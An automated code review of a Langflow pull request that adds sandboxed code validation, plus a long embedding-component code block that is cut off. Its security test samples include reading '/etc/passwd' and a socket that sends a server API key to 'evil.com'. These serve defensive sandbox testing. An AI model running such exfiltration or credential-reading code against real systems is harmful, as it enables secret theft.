Error handling - Verify appropriate errors are raised when blocked operations are attempted
Example test structure:
class TestSandboxSecurity:
    """Test cases for sandbox security restrictions."""

    def test_blocks_file_operations(self):
        """Test that file operations are blocked in sandbox."""
        code = '''
def dangerous_func():
    with open('/etc/passwd', 'r') as f:
        return f.read()
'''
        result = validate_code(code)
        assert len(result["function"]["errors"]) > 0
        assert "blocked" in str(result["function"]["errors"]).lower() or "not allowed" in str(result["function"]["errors"]).lower()

    def test_allows_safe_operations(self):
        """Test that safe operations are allowed."""
        code = '''
import math
import json

def safe_func(x):
    return json.dumps({"result": math.sqrt(x)})
'''
        result = validate_code(code)
        assert result["imports"]["errors"] == []
        assert result["function"]["errors"] == []

src/lfx/src/lfx/services/settings/base.py (1)
339-349: Config flag wiring for dangerous validation looks consistent
The new allow_dangerous_code_validation flag is sane: defaulting to False, clearly documented, and aligned with env_prefix="LANGFLOW_" so LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION works as described. One thing to be aware of: the sandbox currently reads this env var once at import time, so changing this setting at runtime via Settings won't affect ALLOW_DANGEROUS_CODE without a restart. If you expect dynamic toggling, wiring the sandbox flag through Settings (or re-reading on demand) would help; otherwise this behavior is fine as a static boot-time switch.
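If runtime toggling ever becomes a requirement, one possible shape (a sketch only; the helper name is hypothetical and the settings-service lookup is an assumption about lfx's wiring) is to resolve the flag per call instead of at import time:

```python
import os


def _dangerous_code_allowed() -> bool:
    """Hypothetical helper: resolve the flag at call time rather than import time."""
    try:
        # Assumption: a settings service exposing allow_dangerous_code_validation is available.
        from lfx.services.deps import get_settings_service

        return bool(get_settings_service().settings.allow_dangerous_code_validation)
    except ImportError:
        # Fall back to the environment variable outside a full application context.
        return os.getenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", "false").lower() in {"1", "true", "yes"}
```

execute_in_sandbox and create_isolated_import would then call this helper instead of consulting a module-level constant.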
src/lfx/tests/unit/custom/test_sandbox_security.py (3)
3-13: Clarify relationship between namespace isolation and dangerous-code flag
The module docstring currently states that sandboxed code can access filesystem, env, network, and commands without qualification, but execute_in_sandbox is documented as blocking these by default unless LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true is set. It would be clearer (and less misleading for future readers) to explicitly mention that this "CAN access" behavior assumes the dangerous-code flag is enabled, and that by default those operations are blocked while namespace isolation still applies.
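One possible wording for the module docstring (a sketch, not text from the PR):

```python
"""Security tests for sandbox namespace isolation.

These tests verify one property: sandboxed code cannot read or mutate the
server's Python objects (credentials, config, module-level state).

Note: by default the sandbox also blocks dangerous modules (os, subprocess,
socket, ...). The "code CAN access system resources" scenarios below assume
LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true; with default settings those
imports fail with a security error instead.
"""
```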
217-237: Avoid real outbound network connections in tests
In test_sandbox_cannot_exfiltrate_secrets_via_network, the sandboxed code calls:

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('evil.com', 1337))
    s.send(server_api_key.encode())

Even though you intend a NameError on server_api_key, the socket.connect happens before that lookup, so the test will attempt a real outbound TCP connection to evil.com. This can make tests slow, flaky, or surprising in constrained CI environments.
You can keep the exfiltration intent while avoiding actual network calls by reordering or simplifying:

-def test():
-    # Code CAN make network requests
-    # But code CANNOT access server_api_key to send
-    # If isolation is broken, we could do: socket.send(server_api_key.encode())
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(('evil.com', 1337))
-    s.send(server_api_key.encode())  # Try to send server secret
-    s.close()
-    return 'sent'
+def test():
+    # Code COULD make network requests, but here we focus on the secret access.
+    # The NameError on server_api_key should occur before any actual network I/O.
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    # No real connect; just reference the would-be secret.
+    s.send(server_api_key.encode())  # Try to send server secret
+    s.close()
+    return 'sent'

This still proves that sandboxed code cannot obtain server_api_key without touching the network.
252-285: Test name/docstring don't match behavior in test_sandbox_cannot_access_imported_server_modules_state
The test name and docstring say it verifies that sandboxed code "gets fresh module instances, not server's module state", but the inline comments and assertion now acknowledge that json is actually shared and only check that result is a str. As written, the test does not meaningfully validate isolation of imported module state.
Either:
- Align the behavior with the name/docstring, e.g. assert that result reflects unmodified json.dumps, or
- Rename the test and update comments to describe the actual property you care about (e.g., "sandbox can import and use json even if server mutates it; isolation is about Python variables, not module state"), and simplify the setup.
Cleaning this up will make the security guarantees and limitations around module‑level state much clearer for future maintainers.
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2231-2249: Guardrail: validate truncate_input_tokens before passing to SDK. Prevent invalid/negative values from reaching the IBM params.
Within build_embeddings IBM branch:

-            params = {
-                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,
+            safe_trunc = max(0, int(self.truncate_input_tokens or 0))
+            params = {
+                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: safe_trunc,
                 EmbedTextParamsMetaNames.RETURN_OPTIONS: {"input_text": self.input_text},
             }
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
⛔ Files ignored due to path filters (1)
uv.lock is excluded by !**/*.lock
📒 Files selected for processing (8)
- src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (5 hunks)
- src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
- src/backend/tests/unit/utils/test_validate.py (1 hunks)
- src/lfx/src/lfx/custom/sandbox.py (1 hunks)
- src/lfx/src/lfx/custom/validate.py (2 hunks)
- src/lfx/src/lfx/services/settings/base.py (1 hunks)
- src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
- src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)
🧰 Additional context used
🧬 Code graph analysis (3)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(179-242)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(179-242)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
create_isolated_import(142-176)
execute_in_sandbox(179-242)
isolated_import(152-174)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py
[error] 139-139: F841 Local variable result is assigned to but never used.
🪛 GitHub Check: Ruff Style Check (3.13)
src/backend/tests/unit/api/v1/test_validate.py
[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used
src/lfx/src/lfx/custom/sandbox.py
[failure] 161-162: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:161:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 160-163: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:160:23: TRY003 Avoid specifying long messages outside the exception class
[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class
[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)
[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class
[failure] 105-108: Ruff (SIM105)
src/lfx/src/lfx/custom/sandbox.py:105:13: SIM105 Use contextlib.suppress(AttributeError) instead of try-except-pass
[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix
🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py
[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
[high] 63-63: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
- GitHub Check: Run Frontend Tests / Playwright Tests - Shard 27/40
- GitHub Check: Test Docker Images / Test docker images
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
🔇 Additional comments (4)
src/backend/tests/unit/utils/test_validate.py (1)
70-75: I need to examine the actual tests in the file to understand their context and expectations. Now I need to examine the actual test file structure to determine if the change is part of a broader, consistent update or if there's genuinely an inconsistency.
Based on the shell script output and web search, I have sufficient evidence. The output shows that Langflow is a powerful platform for building and deploying AI-powered agents and workflows, and the sandbox implementation with blocking of dangerous operations by default is confirmed. Let me generate the rewritten review comment.
Clarify test coverage inconsistency and file path.
The script output confirms that the sandbox implementation blocks dangerous operations (file I/O, network, subprocess) by default, with an environment variable LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION available to override this behavior.
However, I cannot locate the specific file path src/backend/tests/unit/utils/test_validate.py in the sandbox-related test results. The script output shows comprehensive sandbox tests at src/lfx/tests/unit/custom/test_sandbox_security.py and src/lfx/tests/unit/custom/test_sandbox_isolation.py, plus API endpoint tests at src/backend/tests/unit/api/v1/test_validate.py.
src/backend/tests/unit/api/v1/test_validate.py(lines 84, 108) explicitly verify that dangerous operations ARE blocked by default, which aligns with the change at lines 70-75 to use safe imports. If tests at other line ranges in a utils test file still referenceos/syswithout apparent sandbox restrictions, they may be:
- Testing exception scenarios where blocking is expected
- Running under an environment with the override flag enabled
- Testing different code paths than the validate endpoint
Please confirm:
- Is the file path
src/backend/tests/unit/utils/test_validate.pycorrect, or has it been reorganized?- What do tests at lines 126-134, 270-276, 501-510 verify—sandbox blocking behavior or success cases?
src/lfx/src/lfx/custom/validate.py (1)
11-12: Sandbox integration invalidate_codelooks solidUsing
create_isolated_importfor bothast.Importandast.ImportFromand then running eachFunctionDefthroughexecute_in_sandboxwith a constrained Langflow execution context gives you:
- Blocked dangerous modules at import time ( surfaced as structured import errors ),
- Definition‑time evaluation (decorators / default args) inside the sandbox, and
- No leakage of server globals or real
__builtins__into user code.The
_create_langflow_execution_contextfallback stubs also keep validation robust when optional Langflow modules aren’t importable. Overall this wiring matches the intended security model of the/validate/codeendpoint and looks correct.Also applies to: 51-88, 93-150
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (2)
2018-2019: All IBM SDK and LangChain-IBM signatures verified as correct. The web search confirms that your code correctly uses:
- Credentials(api_key=..., url=...) with ibm_watsonx_ai 1.4.x
- EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS and RETURN_OPTIONS.input_text for text embedding parameters
- WatsonxEmbeddings with model_id, params, watsonx_client (pre-built APIClient), and project_id in langchain-ibm 0.3.19
All parameters and signatures match the documented patterns for the versions pinned in your dependencies.
1859-1866: Dependency versions verified and consistent. Verification confirms all declared versions (requests 2.32.5, ibm_watsonx_ai 1.4.2, langchain_ibm 0.3.19) are:
- Properly pinned in the JSON starter project configuration
- Consistent with pyproject.toml constraints (requests>=2.32.0, ibm-watsonx-ai>=1.3.1,<2.0.0, langchain-ibm>=0.3.8)
- Mutually compatible with no conflicts detected
- Compatible with project's Python requirement (>=3.10,<3.14)
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = 
self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" | ||
| }, |
🛠️ Refactor suggestion | 🟠 Major
Avoid blocking calls and duplicate fetches when listing IBM models.
fetch_ibm_models uses synchronous requests inside async update_build_config and is invoked twice for the same value. Offload to a thread and fetch once to prevent event‑loop stalls and redundant I/O.
Apply this minimal change inside the EmbeddingModelComponent code block:
+import asyncio
@@
- elif field_value == "IBM watsonx.ai":
- build_config["model"]["options"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)
- build_config["model"]["value"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]
+ elif field_value == "IBM watsonx.ai":
+ models = await asyncio.to_thread(self.fetch_ibm_models, base_url=self.base_url_ibm_watsonx)
+ build_config["model"]["options"] = models
+ build_config["model"]["value"] = (models[0] if models else "")
@@
- elif field_name == "base_url_ibm_watsonx":
- build_config["model"]["options"] = self.fetch_ibm_models(base_url=field_value)
- build_config["model"]["value"] = self.fetch_ibm_models(base_url=field_value)[0]
+ elif field_name == "base_url_ibm_watsonx":
+ models = await asyncio.to_thread(self.fetch_ibm_models, base_url=field_value)
+ build_config["model"]["options"] = models
+ build_config["model"]["value"] = (models[0] if models else "")

Committable suggestion skipped: line range outside the PR's diff.
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, fetch_ibm_models is synchronous and called twice in
update_build_config causing event-loop blocking and duplicate I/O; change
update_build_config to offload the synchronous fetch to a thread via
asyncio.to_thread (or asyncio.get_running_loop().run_in_executor) and call it
only once per branch, e.g. await asyncio.to_thread(self.fetch_ibm_models,
base_url=value) store the returned list in a variable, then set
build_config["model"]["options"] = models and build_config["model"]["value"] =
models[0] if models else "" instead of calling fetch_ibm_models twice; add an
import for asyncio at top if missing.
Fix: use the updated value in Ollama base URL refresh.
The ollama_base_url handler ignores field_value, risking stale model lists.
Apply:
- elif field_name == "ollama_base_url":
+ elif field_name == "ollama_base_url":
@@
- ollama_url = self.ollama_base_url
+ ollama_url = field_value or self.ollama_base_url

📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", 